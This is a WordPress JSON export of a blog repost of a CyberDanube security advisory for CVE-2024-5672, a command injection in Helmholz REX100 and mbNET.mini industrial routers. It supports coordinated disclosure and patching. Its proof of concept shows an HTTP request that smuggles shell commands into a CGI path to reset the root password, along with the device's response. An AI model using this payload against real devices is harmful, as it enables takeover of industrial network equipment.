{"id":57882,"date":"2024-07-04T19:30:12","date_gmt":"2024-07-04T16:30:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179369\/CDSR-20240703-0.txt"},"modified":"2024-07-04T19:30:12","modified_gmt":"2024-07-04T16:30:12","slug":"helmholz-industrial-router-rex100-mbconnectline-mbnet-mini-2-2-11-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/helmholz-industrial-router-rex100-mbconnectline-mbnet-mini-2-2-11-command-injection\/","title":{"rendered":"Helmholz Industrial Router REX100 \/ MBConnectline mbNET.mini 2.2.11 Command Injection"},"content":{"rendered":"<p>CyberDanube Security Research 20240703-0<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>title| Authenticated Command Injection<br \/>product| Helmholz Industrial Router REX100<br \/>| MBConnectline mbNET.mini<br \/>vulnerable version| &lt;= 2.2.11<br \/>fixed version| 2.2.13<br \/>CVE number| CVE-2024-5672<br \/>impact| High<br \/>homepage| https:\/\/www.helmholz.de\/<br \/>| https:\/\/mbconnectline.com\/<br \/>found| 2024-05-08<br \/>by| S. Dietz (Office Vienna)<br \/>| CyberDanube Security Research<br \/>| Vienna | St. P\u00f6lten<br \/>|<br \/>| https:\/\/www.cyberdanube.com<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>Vendor description<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>&#8220;Helmholz is your specialist when it comes to sophisticated products for your<br \/>automation projects. With current, clever system solutions from Helmholz, the<br \/>high demands placed on industrial networks in times of increasing automation<br \/>can be met both reliably and efficiently &#8211; including a high level of operating<br \/>convenience. The broad product spectrum ranges from a decentralized I\/O system<br \/>to switches and repeaters, gateways, a NAT gateway\/firewall and secure IoT<br \/>remote machine access.&#8221;<\/p>\n<p>Source: https:\/\/www.helmholz.de\/en\/company\/about-helmholz\/<\/p>\n<p>Vulnerable versions<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>Helmholz Industrial Router REX100 &lt;= 2.2.11<br \/>MBConnectline mbNET.mini &lt;= 2.2.11<\/p>\n<p>Vulnerability overview<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>1) Authenticated Command Injection (CVE-2024-5672)<br \/>A command injection was identified on the webserver. This vulnerability can<br \/>only be exploited if a user is authenticated on the web interface. This way,<br \/>an attacker can invoke commands and is able to get full control over the whole<br \/>device.<\/p>\n<p>Proof of Concept<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>1) Authenticated Command Injection (CVE-2024-5672)<br \/>The following GET request changes the password for the root user and returns<br \/>the process list of the device.<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>GET \/cgi-bin\/ping;echo$IFS&#8217;root:password&#8217;|chpasswd;ps;.sh HTTP\/1.1<br \/>Host: 192.168.25.11<br \/>Accept-Language: en-US,en;q=0.5<br \/>Accept-Encoding: gzip, deflate, br<br \/>Authorization: Basic aGVsbWhvbHo6cm91dGVy<br \/>Connection: close<br \/>Upgrade-Insecure-Requests: 1<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>HTTP\/1.0 200 OK<br \/>This is haserl version 0.8.0<br \/>This program runs as a cgi interpeter, not interactively.<br \/>Bug reports to: Nathan Angelacos &lt;nangel@users.sourceforge.net&gt;<\/p>\n<p>Password for &#8216;root&#8217; changed<br \/>PID USER VSZ STAT COMMAND<br \/>1 root 2292 S init<br \/>2 root 0 SW [kthreadd]<br \/>3 root 0 SW [ksoftirqd\/0]<br \/>4 root 0 SW [events\/0]<br \/>5 root 0 SW [khelper]<br \/>8 root 0 SW [async\/mgr]<br \/>[&#8230;]<\/p>\n<p>Solution<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>Update to latest version: 2.2.13<\/p>\n<p>Workaround<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>None<\/p>\n<p>Recommendation<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>CyberDanube recommends Helmholz customers to upgrade the firmware to the latest<br \/>version available and to restrict network access to the management interface of<br \/>the device.<\/p>\n<p>Contact Timeline<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>2024-05-15: Contacting Helmholz via psirt@helmholz.de.<br \/>2024-05-15: Receiving security contact for MBConnectline.<br \/>2024-05-21: Contact stated they are working on a fix.<br \/>2024-06-13: Received advisory from contact and assigned CVE number.<br \/>2024-07-01: Contact sends out final release date.<br \/>2024-07-03: Coordinated release of advisory with CERT@VDE.<\/p>\n<p>Web: https:\/\/www.cyberdanube.com<br \/>Twitter: https:\/\/twitter.com\/cyberdanube<br \/>Mail: research at cyberdanube dot com<\/p>\n<p>EOF S. Dietz \/ @2024<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CyberDanube Security Research 20240703-0&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-title| Authenticated Command Injectionproduct| Helmholz Industrial Router REX100| MBConnectline mbNET.minivulnerable version| &lt;= 2.2.11fixed version| 2.2.13CVE number| CVE-2024-5672impact| Highhomepage| https:\/\/www.helmholz.de\/| https:\/\/mbconnectline.com\/found| 2024-05-08by| S. Dietz (Office Vienna)| CyberDanube Security Research| Vienna | St. P\u00f6lten|| https:\/\/www.cyberdanube.com&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- Vendor description&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-&#8220;Helmholz is your specialist when it comes to sophisticated products for yourautomation projects. With current, clever system solutions &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57882","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57882"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57882\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}